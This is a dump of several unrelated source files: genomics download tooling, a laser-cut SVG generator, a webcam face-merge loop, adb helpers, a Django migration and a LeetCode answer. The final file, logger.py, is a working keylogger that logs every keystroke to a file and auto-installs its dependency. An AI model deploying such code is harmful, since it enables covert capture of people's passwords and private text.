8abf522f039d7263cf9a85dd6f5c6d6307cf7568 | 4787babe647fbe4baf200dd6f2826e4b4c264de1 | /data/fetchRegion.py | 82366d9f1579f10b608f0c003f884d05c7b07ce8 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | glennhickey/vg2sg | 84611c0f1967e3e06630fa24e51350d24531f56c | 85ca2e8cf0b0e3815281b7adf8a2149a9803d435 | refs/heads/master | 2020-12-24T06:38:52.537300 | 2016-05-06T14:46:33 | 2016-05-06T14:46:33 | 39,136,801 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,655 | py | #!/usr/bin/env python2.7
#
# FROM https://raw.githubusercontent.com/adamnovak/sequence-graphs/master/scripts/fetchRegion.py
#
"""
fetchRegion.py: Fetch the sequence data, GRC alignments, and gene sets for a GRC
region (like "LRC_KIR" or "MHC") by name.
"""
import argparse, sys, os, os.path, random, subprocess, shutil, itertools
import collections, urllib2, shutil, subprocess, glob, doctest
import tsv
from Bio import AlignIO, SeqIO, Align, Entrez
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
def parse_args(args):
    """
    Parse the full command-line argument list (including the program name
    at args[0]) and return an argparse.Namespace holding every option.
    """
    parser = argparse.ArgumentParser(description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument("region",
        help="name of the region to download, and the output directory")
    parser.add_argument("--assembly_url",
        default=("ftp://ftp.ncbi.nlm.nih.gov/genomes/all/"
            "GCA_000001405.17_GRCh38.p2/"
            "GCA_000001405.17_GRCh38.p2_assembly_structure"),
        help="URL for the assembly, containing genomic_region_definitions.txt")
    parser.add_argument("--email", default="anovak@soe.ucsc.edu",
        help="E-mail address to report to Entrez")
    # Skip the program name; argparse only wants the actual arguments.
    return parser.parse_args(args[1:])
def url_open_tsv(url):
    """
    Open a TSV URL and return a tsv.TsvReader over it, which yields each
    line as a list of fields.

    Re-raises urllib2.URLError (after printing the failing URL) if the URL
    cannot be opened.
    """
    try:
        reader = tsv.TsvReader(urllib2.urlopen(url))
    except urllib2.URLError as err:
        # Report which URL failed before handing the error to the caller.
        print("Could not open " + url)
        raise err
    return reader
def get_region_info(region_name, assembly_root):
    """
    Go download the genomic_region_definitions.txt from the specified assembly,
    and return the (contig, start, end) of the named region.

    Raises RuntimeError if no region with that name is listed.
    """
    # Open the region definitions
    for parts in url_open_tsv(assembly_root + "/genomic_regions_definitions.txt"):
        # For every region in the list
        if parts[0] == region_name:
            # We found it. Parse out contig, start, end.
            # Contig is like "CM000663.2" and not all that useful...
            # Start/end are converted to int; presumably 1-based inclusive
            # GRC coordinates — TODO confirm against the file format docs.
            return (parts[1], int(parts[2]), int(parts[3]))
    # If we get here, there's no region by that name.
    raise RuntimeError("No region named " + region_name)
def get_region_sequences(region_name, assembly_root):
    """
    Given the name of a region and the root URL for the assembly, yield all the
    alt locus sequence names (Genbank IDs) and assembly unit names
    (ALT_REF_LOCI_###) that are in the region, as (sequence_id, unit) pairs.
    """
    # Open the alt locus placement file
    for parts in url_open_tsv(assembly_root + "/all_alt_scaffold_placement.txt"):
        # For every alt locus...
        if parts[7] == region_name:
            # We found one in the correct region (which happens to be column 7)
            # Give its sequence ID/accession with version (column 3) and the
            # assembly unit name (column 0).
            yield parts[3], parts[0]
def get_record_by_grc(grc_id):
    """
    Given a GRC ID, return the Entrez nucleotide DocSum record.

    Raises RuntimeError if the Entrez search returns more than one hit.
    NOTE(review): assumes Entrez.email has already been configured by the
    caller, as NCBI requires — confirm before use.
    """
    # First just search the ID as a search term.
    search_results = Entrez.read(Entrez.esearch("nucleotide", term=grc_id))
    if len(search_results["IdList"]) > 1:
        # We should only get one result. If we have many, we might be looking at
        # the wrong one.
        print(search_results)
        raise RuntimeError("Too many results!")
    # Grab the handle thingy for the first search result
    first_handle = Entrez.read(Entrez.epost("nucleotide",
        id=search_results["IdList"][0]))
    # Actually download that record
    record = Entrez.read(Entrez.esummary(db="nucleotide",
        webenv=first_handle["WebEnv"], query_key=first_handle["QueryKey"]))[0]
    # Return it
    return record
def get_ucsc_name(grc_id, alt_parent_grc_id=None):
    """
    Given a GRC-style (genbank) ID with version, like "CM000663.2" or
    "GL383549.1" or "KI270832.1", get the UCSC name for that sequence, like
    "chr6_GL000252v2_alt".

    If the sequence is an alt, the GRC id of its parent chromosome must be
    specified; the function then recurses once to name the parent.
    """
    if alt_parent_grc_id is None:
        # Simple case; it's a primary chromosome.
        # Fetch the record
        record = get_record_by_grc(grc_id)
        # Parse out all the "extra" fields (a "|"-delimited string).
        extra_parts = record["Extra"].split("|")
        # Find the "gnl" key
        gnl_index = extra_parts.index("gnl")
        # The chromosome number/letter is two fields later.
        chromosome_character = extra_parts[gnl_index + 2]
        # Make it chrThat
        ucsc_name = "chr{}".format(chromosome_character)
    else:
        # We do have a parent. Get its UCSC name.
        parent_name = get_ucsc_name(alt_parent_grc_id)
        # Convert from .2 or whatever to v2 or whatever (UCSC version style).
        name_middle = grc_id.replace(".", "v")
        # Put them in the name pattern template to generate the name
        ucsc_name = "{}_{}_alt".format(parent_name, name_middle)
    # Report the result
    print("{} is {} at UCSC".format(grc_id, ucsc_name))
    return ucsc_name
def get_gi_number(grc_id):
    """
    Given a GRC-style (genbank) ID with version, like "CM000663.2" or
    "GL383549.1" or "KI270832.1", get the GI number associated with that ID from
    Entrez.
    """
    # Go fetch the record
    record = get_record_by_grc(grc_id)
    # Log the mapping for the user before returning.
    print("{} = {}".format(grc_id, record["Gi"]))
    # Return the GI number. TODO: should this be the ID instead because of how
    # we use it next? Are they ever different?
    return record["Gi"]
def get_length(gi_id):
    """
    Get the length of a sequence (in bases) given its numerical GI number.
    """
    # Grab the handle thingy for the record with this ID
    handle = Entrez.read(Entrez.epost("nucleotide", id=str(gi_id)))
    # Actually download that record's DocSum.
    record = Entrez.read(Entrez.esummary(db="nucleotide",
        webenv=handle["WebEnv"], query_key=handle["QueryKey"]))[0]
    # Return the length of the sequence
    return record["Length"]
def get_sequence(gi_id, start=None, end=None):
    """
    Get a sequence by numerical GI number, optionally with start and end
    parameters (in 1-based coordinates from the left). If start is
    specified, end must also be specified.

    Returns a Biopython SeqRecord whose id is rewritten to "GI<gi_id>".
    """
    if start is None:
        # Go fetch the whole record. We need to make the ID a str or the API
        # client freaks out.
        fetch_handle = Entrez.efetch(db="nucleotide", id=str(gi_id),
            rettype="fasta")
    else:
        # Just fetch part of it
        fetch_handle = Entrez.efetch(db="nucleotide", id=str(gi_id),
            rettype="fasta", seq_start=start, seq_end=end)
    # Load up the FASTA record
    record = SeqIO.read(fetch_handle, "fasta")
    # Change the record FASTA ID to just GIwhatever
    record.id = "GI{}".format(gi_id)
    # Return the fixed-up record
    return record
def download_gff3(ref_acc, alt_acc, alt_unit, assembly_root, out_filename):
    """
    Download the GFF3 alignment between the given reference accession and the
    given alt accession (in the given assembly unit), from the given assembly
    root URL, and save it to the given output filename.

    NOTE(review): uses urllib2, which exists only on Python 2, while other
    functions in this script use Python 3 style print() calls -- confirm
    which interpreter this is meant to run under.
    """
    # Figure out what we want to download
    gff3_url = "{}/{}/alt_scaffolds/alignments/{}_{}.gff".format(assembly_root,
        alt_unit, alt_acc, ref_acc)
    # Open the URL to read
    in_stream = urllib2.urlopen(gff3_url)
    with open(out_filename, "w") as out_stream:
        # Copy everything to the output file as in
        # <http://stackoverflow.com/a/5397438/402891>
        shutil.copyfileobj(in_stream, out_stream)
def get_genes(grc_id, out_name, start=1, end=None, alt_parent_grc_id=None,
    db="hg38"):
    """
    Given a GRC ID (like "CM000663.2"), the name of the contig on which to
    report the genes, optional start and end coordinates (1-based) and the GRC
    ID of the parent chromosome if it is an alt, yield BED lines for all the
    genes in the specified region.
    If start is specified, coordinates will be given relative to that position.
    Assumes "hgsql" is installed and configured and available on the PATH.
    Uses the hg38 database unless told otherwise.
    All inputs must be trusted and not permitted to contain SQL injection.

    This is a generator: it skips hgsql's first (header) line, yields every
    subsequent output line, and raises RuntimeError("hgsql") if the process
    exits with a nonzero status.
    """
    # Convert to 0-based not-end-inclusive coordinates.
    start -= 1
    # Get the name to look up in the database.
    query_contig = get_ucsc_name(grc_id, alt_parent_grc_id)
    # Spec out the query. TODO: Can I not say the database name constantly?
    # (Builds the SQL by string concatenation; safe only because, per the
    # contract above, all inputs are trusted.)
    query_parts = ["SELECT \"", out_name, "\", ", db, ".knownGene.txStart - ",
        start, ", ", db, ".knownGene.txEnd - ", start, ", ", db,
        ".kgXref.geneSymbol, 0, ", db, ".knownGene.strand FROM ", db,
        ".knownGene LEFT OUTER JOIN ", db, ".kgXref ON ", db,
        ".knownGene.name = ", db, ".kgXref.kgID WHERE ", db,
        ".knownGene.txStart != ", db, ".knownGene.cdsStart AND ", db,
        ".knownGene.chrom = \"", query_contig, "\" AND ", db,
        ".knownGene.txStart >= ", start]
    if end is not None:
        # Require the end criterion to be met too.
        query_parts += [" AND ", db, ".knownGene.txEnd < ", end]
    # Finish off the query.
    query_parts.append(";")
    # Put together the whole query.
    query = "".join([str(part) for part in query_parts])
    # Build the hgsql command line
    args = ["hgsql", "-e", query]
    # Open the process
    process = subprocess.Popen(args, stdout=subprocess.PIPE)
    for line in itertools.islice(process.stdout, 1, None):
        # For all lines except the first, yield them because they are BED lines.
        yield line
    if process.wait() != 0:
        raise RuntimeError("hgsql")
    # We are done with this process.
    process.stdout.close()
def open_gene_bed(region, sequence_id):
    """
    Given the region name and the sequence ID ("ref" or "GI<whatever>") for a
    sequence, give back an output file object to which a BED of the genes in
    that sequence may be written.

    Creates <region>/genes/<sequence_id>/ if needed and returns a handle to
    "genes.bed" inside it, opened for writing (truncating any previous
    contents). The caller is responsible for closing the handle.
    """
    # Each bed goes in a folder named after its sequence, so hal2assemblyHub can
    # use it.
    bed_dir = "{}/genes/{}".format(region, sequence_id)
    try:
        # Create unconditionally instead of checking exists() first: the
        # original check-then-create pair was racy if two processes ran
        # concurrently against the same output tree.
        os.makedirs(bed_dir)
    except OSError:
        # Directory already exists (or genuinely cannot be created, in which
        # case the open() below will fail loudly anyway).
        pass
    # Open a bed file in there for writing and return it.
    return open(bed_dir + "/genes.bed", "w")
def main(args):
    """
    Parses command line arguments and do the work of the program.
    "args" specifies the program arguments, with args[0] being the executable
    name. The return value should be used as the program's exit code.

    Pipeline (as implemented below): fetch the reference slice for the
    requested region, write it as <region>/ref.fa, then for each alt in the
    region download its sequence, its GFF3 alignment (converted to PSL via
    gff3ToPsl + sed), and its gene BED, and finally shell out to psl2maf.py
    to build <region>/GRCAlignment.maf. Requires network access, hgsql,
    gff3ToPsl and sed on the PATH.
    """
    if len(args) == 2 and args[1] == "--test":
        # Run the tests
        return doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
    options = parse_args(args) # This holds the nicely-parsed options object
    # Set Entrez e-mail
    Entrez.email = options.email
    # Go get the region of the reference we're talking about. Starts and ends
    # are 1-based.
    ref_acc, ref_start, ref_end = get_region_info(options.region,
        options.assembly_url)
    # Make our output directory
    if not os.path.exists(options.region):
        os.makedirs(options.region)
    # We're going to write a chrom.sizes file with accessions (not the GI
    # numbers) for the gff3->psl conversion step
    acc_chrom_sizes = tsv.TsvWriter(open(options.region + "/acc.chrom.sizes",
        "w"))
    # Get the reference's GI
    ref_gi = get_gi_number(ref_acc)
    print("Reference for {} is GI{}:{}-{} 1-based".format(options.region,
        ref_gi, ref_start, ref_end))
    # Grab the reference sequence
    ref_seq = get_sequence(ref_gi, ref_start, ref_end)
    print("Got {}bp for a {}bp reference".format(len(ref_seq),
        ref_end - ref_start + 1))
    if len(ref_seq) > ref_end - ref_start + 1:
        # Clip it down if it's too long. Assuming we have the correct sort of
        # coordinates, and that we got served the data starting at the correct
        # offset.
        ref_seq = ref_seq[0:ref_end - ref_start + 1]
    elif len(ref_seq) < ref_end - ref_start:
        raise RuntimeError("Didn't get enough sequence from the API!")
    # Change it to be just called "ref"
    ref_seq.id = "ref"
    # Write it to <region>/ref.fa
    SeqIO.write([ref_seq], open("{}/ref.fa".format(options.region), "w"),
        "fasta")
    # Write a chromosome size entry for the reference by its accession
    acc_chrom_sizes.line(ref_acc, get_length(ref_gi))
    print("Writing genes for ref")
    # Make a BED to put reference genes in
    ref_bed = open_gene_bed(options.region, "ref")
    for line in get_genes(ref_acc, "ref", ref_start, ref_end):
        # Write all the BED lines for the appropriate region of the reference to
        # that file.
        ref_bed.write(line)
    ref_bed.close()
    for alt_acc, alt_unit in get_region_sequences(options.region,
        options.assembly_url):
        # For every alt in the region
        # Get its GI number
        alt_gi = get_gi_number(alt_acc)
        print("Downloading alt GI{}".format(alt_gi))
        # Grab the sequence data
        alt_seq = get_sequence(alt_gi)
        # Write it to <region>/GI<number>.fa
        SeqIO.write([alt_seq], open("{}/GI{}.fa".format(options.region, alt_gi),
            "w"), "fasta")
        # Add this alt to the chromosome-sizes-by-accession file
        acc_chrom_sizes.line(alt_acc, get_length(alt_gi))
        # Sneak into the TSV writer and flush, so the sizes file can now be
        # read.
        acc_chrom_sizes.stream.flush()
        # Where should we put the GFF alignment for this alt to the reference?
        alt_gff3 = "{}/GI{}.gff3".format(options.region, alt_gi)
        print("Downloading alignment")
        # Go download it
        download_gff3(ref_acc, alt_acc, alt_unit, options.assembly_url,
            alt_gff3)
        # And we need to convert that to PSL
        alt_psl = "{}/GI{}.psl".format(options.region, alt_gi)
        print("Converting to PSL")
        # Run the conversion with the bit of the sizes file we have so far. We
        # need to pass the chrom.sizes file twice now because gff3ToPsl has
        # changed its interface.
        subprocess.check_call(["gff3ToPsl", options.region + "/acc.chrom.sizes",
            options.region + "/acc.chrom.sizes", alt_gff3, alt_psl])
        # Edit the output to point to the GI instead of the accession
        subprocess.check_call(["sed", "-i", "s/{}/GI{}/g".format(alt_acc,
            alt_gi), alt_psl])
        print("Writing genes for GI{}".format(alt_gi))
        # Make a BED to put alt genes in
        alt_bed = open_gene_bed(options.region, "GI{}".format(alt_gi))
        for line in get_genes(alt_acc, "GI{}".format(alt_gi),
            alt_parent_grc_id=ref_acc):
            # Write all the BED lines for the alt to the file
            alt_bed.write(line)
        alt_bed.close()
    # Now we need to do psl2maf, complete with globbing.
    print("Creating GRC MAF")
    # Find the psl2maf.py script
    psl2maf = (os.path.dirname(os.path.realpath(__file__)) +
        "/../mhc/psl2maf.py")
    # Go call psl2maf, moving the reference stuff over to "ref" and shifting it
    # back so that the first base we clipped out of the reference is 0,
    # splitting apart mismatches, and making sure to use all the PSLs and MAFs
    # in our output directory. We make sure to add 1 to the reference start in
    # the offset, because some basedness-conversion needs to happen. TODO: Make
    # this a function or make this use an import or somehow de-uglify it.
    args = ([psl2maf, "--maf",
        options.region + "/GRCAlignment.maf", "--referenceOffset",
        str(-ref_start + 1), "--referenceSequence", "ref", "--noMismatch",
        "--psls"] + glob.glob(options.region + "/*.psl") + ["--fastas"] +
        glob.glob(options.region + "/*.fa"))
    print("Calling: {}".format(" ".join(args)))
    subprocess.check_call(args)
if __name__ == "__main__" :
sys.exit(main(sys.argv))
| [
"glenn.hickey@gmail.com"
] | glenn.hickey@gmail.com |
1da9516b8fceeaee1bfc89b3ac38f7c6d2cd0996 | ee8db8a13134cc19e4be22fa76de7232da777963 | /risers.py | 134eb1be2076ad78ed179f644a876471cec4fac8 | [
"MIT"
] | permissive | sile16/lasercut | 7bee1ed3ef67a486edd6f0eef4f53a11e116c467 | 55f88ffb9a693e2065a897ab469e68ee052459f6 | refs/heads/master | 2020-04-08T00:50:37.630998 | 2018-12-02T05:30:34 | 2018-12-02T05:30:34 | 158,869,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,081 | py | #p3 size 791mm x 384mm
#sculpteo 940mm x 590
import svgwrite
# Cutting dimensions for the laser-cut risers. Presumably millimetres, per
# the panel-size comments at the top of this file -- TODO confirm.
join_width = 5.9
color_width = 41
color_height = 96.475
panel_width = 940
panel_height = 590
shelf_width = 939
depth = 160
# The shared SVG canvas every shape below is drawn onto; saved at end of file.
dwg = svgwrite.Drawing('risers.svg',size=(791,384))
stroke_width="0.01"
riser_height = 290
def slot(x,y):
    # Draw a U-shaped slot into the module-level drawing `dwg`: two vertical
    # edges join_width apart, centred on x, going down depth/2 from y, plus a
    # connecting bottom edge.
    dwg.add(dwg.line((x-join_width/2, y), (x-join_width/2, y+depth/2), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
    dwg.add(dwg.line((x+join_width/2, y), (x+join_width/2, y+depth/2), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
    dwg.add(dwg.line((x-join_width/2, y+depth/2), (x+join_width/2, y+depth/2), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
def shelf(x,y):
    # Draw a shelf outline starting at (x, y): top edge (shelf_width long) and
    # left edge (depth deep), with a slot() every color_width along the top.
    # NOTE(review): unlike riser(), no bottom/right edges are drawn, and this
    # function is never called in the visible code -- confirm intent.
    #top
    dwg.add(dwg.line((x, y), (x+shelf_width, y), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
    #left
    dwg.add(dwg.line((x, y), (x, y+depth), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
    curr_pos=0
    for incr in range(0,int(shelf_width/color_width)):
        curr_pos+=color_width
        slot(curr_pos,y)
def riser(x,y):
    # Draw a full riser rectangle (riser_height wide by depth tall) at (x, y)
    # with a single slot cut into its top edge at a fixed 128.63 offset.
    #top
    dwg.add(dwg.line((x, y), (x+riser_height, y), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
    #left
    dwg.add(dwg.line((x, y), (x, y+depth), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
    #bottom line
    dwg.add(dwg.line((x, y+depth), (x+riser_height, y+depth), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
    #verticle right
    dwg.add(dwg.line((x+riser_height, y), (x+riser_height, y+depth), stroke=svgwrite.rgb(0, 0, 255),stroke_width=stroke_width))
    slot(x+128.63,y)
# Lay out three rows of risers, stacked at y = 0, depth and 2*depth, placing
# as many as fit across panel_width (spaced riser_height apart along x),
# then write the finished SVG to risers.svg.
for num_riser in range(0,int(panel_width/riser_height)):
    riser(num_riser*riser_height,0)
for num_riser in range(0,int(panel_width/riser_height)):
    riser(num_riser*riser_height,depth)
for num_riser in range(0,int(panel_width/riser_height)):
    riser(num_riser*riser_height,depth*2)
#dwg.add(dwg.line((0, 0), (10, 0), stroke=svgwrite.rgb(0, 0, 255),stroke_width="0.01"))
#dwg.add(dwg.text('Test', insert=(0, 0.2), fill='red'))
dwg.save()
| [
"sile16@gmail.com"
] | sile16@gmail.com |
f5f9386957fc25339a4156a8f9ec345c579c46d1 | e6292e5c2bbf194f51f6ce0b67a5490c9707a011 | /cameraProcess.py | 11942607b34e21eb03280168f95db465644cc090 | [
"Apache-2.0"
] | permissive | daxiangpanda/face_merge | d5536b334638f8cf9f940c2cc61fa89b5a11fa1f | 601e1959412ac05c18a178a853a5214cbf2bc8c3 | refs/heads/master | 2020-04-11T22:02:05.269851 | 2018-12-17T12:00:15 | 2018-12-17T12:00:15 | 162,123,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,120 | py | import cv2
import core
import time
def fetch_frame(video_path):
    """Extract every frame of *video_path* to image/frame<N>.jpg, run
    changeFace() on each saved frame, and return the list of frame paths.

    Writes into a pre-existing "image/" directory and times each
    changeFace() call, printing the elapsed seconds.
    """
    video = cv2.VideoCapture(video_path)
    success,image = video.read()
    count = 0
    frame_path_list = []
    while success:
        cv2.imwrite("image/frame%d.jpg" % count, image)  # save frame as JPEG file \
        # try:
        start = time.time()
        changeFace("image/frame%d.jpg" % count,"images/model_zbll.jpg")
        print(time.time() - start)
        # except Exception as e:
        #     count += 1
        #     continue
        success,image = video.read()
        frame_path_list.append("image/frame%d.jpg" % count)
        count += 1
    return frame_path_list
def changeFace(src_img,dst_img):
    # Thin wrapper around the project-local core.face_merge_ret helper.
    # NOTE(review): fetch_frame() passes a file path as src_img, while the
    # webcam loop below passes a raw frame array -- verify that
    # core.face_merge_ret accepts both forms.
    return core.face_merge_ret(src_img,dst_img)
# Live preview loop: read from the default webcam, mirror each frame, run the
# face merge against the model image, and display until 'q' is pressed.
cap = cv2.VideoCapture(0)
# NOTE(review): cap.set() is called with raw property indices (3, 4, 1);
# presumably frame width/height and a position/FPS property -- confirm
# against the cv2 CAP_PROP_* constants.
cap.set(3,640)
cap.set(4,480)
cap.set(1, 10.0)
while True:
    ret,frame = cap.read()
    if ret == True:
        frame = cv2.flip(frame, 1)
        # a = out.write(frame)
        cv2.imshow("frame", changeFace(frame,"images/model_zbll.jpg"))
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    else:
        break
cap.release()
| [
"xinzhongliu@sohu-inc.com"
] | xinzhongliu@sohu-inc.com |
75b5bd8ac9fb5f7069eba6b2d14f6f357893d43f | 3ac988c7f21de80e4afe2f0ec86c56e5430647b1 | /out/production/leetcode/python/35.py | 9aa56e79aba3e880a42a3bb67236902ad7f23e97 | [] | no_license | seektruth/leetcode-solutions | 623cf8f87420dc176eecf8df90687a800ab41f2b | 9489c4c71e551958686d222e5617c879fe06d6d4 | refs/heads/master | 2021-01-17T18:15:01.621661 | 2017-07-31T02:26:37 | 2017-07-31T02:26:37 | 62,996,328 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | import bisect
class Solution(object):
def searchInsert(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
return bisect.bisect_left(nums, target)
# Ad-hoc smoke test left in by the author (Python 2 "print" statement; this
# module is Py2-era).
a = Solution()
print a.searchInsert([], 2)
| [
"smiling_man@163.com"
] | smiling_man@163.com |
e29538e65e3f1342c183463884e05200eba1d3f2 | 111396146b5004f6c46ee69b6a7384a77de400fa | /student_register/migrations/0001_initial.py | 408535b0b43fb91601f4d8546b30e9f7200355d7 | [] | no_license | samfubuki/Logiin-and-CRUD-urls-using-django | 81aef1037cd31ae626b92b4d5beb681dbd387374 | 67c3adbc9029e5778cb37d68d38c5884f013e6b8 | refs/heads/master | 2022-08-03T19:55:29.433122 | 2020-05-28T08:35:52 | 2020-05-28T08:35:52 | 267,505,241 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,054 | py | # Generated by Django 3.0.6 on 2020-05-19 12:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial Django migration: creates the Stream and Student
    # tables for the student_register app.
    initial = True
    # No prior migrations to depend on.
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Stream',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Student',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('fullname', models.CharField(max_length=200)),
                ('stu_code', models.CharField(max_length=200)),
                ('mobile', models.CharField(max_length=200)),
                # Each Student belongs to one Stream; deleting the Stream
                # cascades to its Students.
                ('stream', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='student_register.Stream')),
            ],
        ),
    ]
| [
"pbhardwaj.preet@gmail.com"
] | pbhardwaj.preet@gmail.com |
6a1b9b2699b5d40ab586304e0361f170ab18ac56 | ed8cdcce521b8cab33c66f716c0886e17f035d21 | /.history/public/publicfunction_20191221202740.py | 99378bfc5a5a438a74f015f442e55bdf06ce5ce6 | [] | no_license | deancsdfy/AndroidPerformanceTool_windows | 8ac35729bc651c3af551f090d6788b6ee3f17eb5 | c4906aa9347e8e5eca68dbb7cf2d66a327c70d1f | refs/heads/master | 2020-11-27T20:38:55.014228 | 2020-01-09T15:55:52 | 2020-01-09T15:55:52 | 229,593,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,646 | py | #coding=utf-8
import os,platform
import subprocess
import re
serialno_num=''  # cached device serial (only used by the commented-out code below)
# Pick the host OS's text-search tool: findstr on Windows, grep elsewhere.
system = platform.system()
# BUGFIX: the original tested `system is "Windows"`, which compares object
# identity rather than string equality; platform.system() returns a fresh
# string, so the identity test was unreliable and find_util effectively
# always fell through to "grep", even on Windows.
if system == "Windows":
    find_util = "findstr"
else:
    find_util = "grep"
#判断是否设置环境变量ANDROID_HOME
# if "ANDROID_HOME" in os.environ:
# if system == "Windows":
# command = os.path.join(os.environ["ANDROID_HOME"], "platform-tools", "adb.exe")
# else:
# command = os.path.join(os.environ["ANDROID_HOME"], "platform-tools", "adb")
# else:
# raise EnvironmentError(
# "Adb not found in $ANDROID_HOME path: %s." %os.environ["ANDROID_HOME"])
#获取手机
def get_devices():
    """Return the serial numbers (str) of devices listed by ``adb devices``.

    The first output line ("List of devices attached") is skipped; parsing
    stops at the first line not containing "device" (normally the trailing
    blank line). Returns an empty list if adb is missing or reports nothing.
    """
    devices = []
    result = subprocess.Popen("adb devices", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.readlines()
    for raw_line in result[1:]:
        # BUGFIX: Popen pipes yield bytes on Python 3; the original compared
        # a str against bytes ('device' in line.strip()), which raises
        # TypeError. Decode each line before inspecting it.
        line = raw_line.decode(errors="replace").strip()
        if 'device' in line:
            devices.append(line.split()[0])
        else:
            break
    return devices
#adb命令
def adb(args):
    """Run ``adb <args>`` through os.popen and return the resulting pipe
    (read it for the command's stdout).

    The serial-number selection logic was already commented out in the
    original and is intentionally not reproduced here.
    """
    command = "adb %s" %(str(args))
    return os.popen(command)
#adb shell命令
def shell(args):
    """Run an ``adb shell`` command and return the subprocess.Popen object
    (caller reads .stdout). Also prints the command string it builds.

    NOTE(review): the command is wrapped in literal single quotes
    ('adb shell "..."'), which makes the shell treat the whole thing as one
    token rather than a command -- this quoting looks broken; confirm it
    actually executes as intended on the target platform.
    """
    # global serialno_num
    # if serialno_num == "":
    #     devices = get_devices()
    #     serialno_num = devices[0]
    cmd = '\'adb shell \"%s\"\'' %( str(args))
    print(cmd)
    # cmd = str(args)
    return subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def get_current_packagename():
    """Print the package name of the foreground activity via adb dumpsys.

    Requires a connected device. The return statement is commented out, so
    this function currently returns None and only prints the result.
    """
    # Regex that matches "package/activity" tokens in dumpsys output
    pattern = re.compile(r"[a-zA-Z0-9\.]+/.[a-zA-Z0-9\.]+")
    # package = shell('adb shell "dumpsys activity top| grep ACTIVITY"').stdout.read()
    package = shell('dumpsys activity top| grep ACTIVITY').stdout.read()
    # Use index -1 because on some models (e.g. Xiaomi Mi 8) extra system
    # processes/packages are also returned before the foreground one.
    print(pattern.findall(package.decode())[-1].split('/')[0])
    # return pattern.findall(package.decode())[-1].split('/')[0]
def get_current_activity():
    """Formerly printed the foreground activity name via adb dumpsys.

    Everything but the regex compilation is commented out, so this function
    is currently a no-op that returns None.
    """
    # Regex that matches "package/activity" tokens in dumpsys output
    pattern = re.compile(r"[a-zA-Z0-9\.]+/.[a-zA-Z0-9\.]+")
    # With newer adb versions this command no longer yields the activity.
    # package = shell('dumpsys activity top| grep ACTIVITY').stdout.read()
    # print(pattern.findall(package.decode())[-1].split('/')[1])
    # return pattern.findall(package.decode())[-1].split('/')[1]
if __name__ == "__main__":
get_current_activity()
get_current_packagename() | [
"denacsdfy@gmail.com"
] | denacsdfy@gmail.com |
44e6b8f039039cca59ab829d78f56f8e1e0dcf77 | cc5fa752265dcb47ffab721f1a818413b77725d6 | /logger.py | 1c43a16b215da849cefcdbbb353820d733270af2 | [] | no_license | phsm99/keylogger | 9d9602033a72f1c4105facbd60af23a24f9f9b74 | 1090e8a024b19786ae4e1f516ef669073a20d2d2 | refs/heads/master | 2021-01-15T00:44:22.954431 | 2020-02-24T18:59:26 | 2020-02-24T18:59:26 | 242,817,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py | try:
from pynput import keyboard
except ImportError:
import subprocess
subprocess.call(['pip', 'install', 'pynput'])
from pynput import keyboard
def write_on_file(string):
    """Append *string* to log.txt (UTF-8), preceded by a newline.

    On an open failure a short diagnostic is printed and the error is
    re-raised so the caller still sees it.
    """
    try:
        log = open('log.txt', 'a+', encoding='utf-8')
    except OSError:
        # Narrowed from a bare "except:": only file-open failures belong here.
        print('Erro abrir arquivo de saída')
        raise
    # "with" guarantees the handle is closed even if the write itself fails
    # (the original leaked the handle on a write error). Also renamed the
    # local from "file", which shadowed the builtin.
    with log:
        log.write('\n{0}'.format(string))
def on_press(key):
    """Translate a pynput key-press event into loggable text and record it
    via write_on_file()."""
    try:
        # Printable keys expose .char; str() keeps the original behaviour of
        # logging the literal 'None' for dead keys whose char is None.
        pressed = str(key.char)
    except AttributeError:
        # Special keys have no .char: log a plain space for the space bar,
        # otherwise the key's repr padded with spaces on both sides.
        pressed = " " if key == key.space else " " + str(key) + " "
    write_on_file(pressed)
def start():
    """Start the pynput keyboard listener and block forever, routing every
    key press to on_press(). Never returns until the listener stops."""
    keyboard_listener = keyboard.Listener(on_press=on_press)
    with keyboard_listener:
        keyboard_listener.join()
if __name__ == "__main__":
print('Listening')
start()
| [
"noreply@github.com"
] | noreply@github.com |
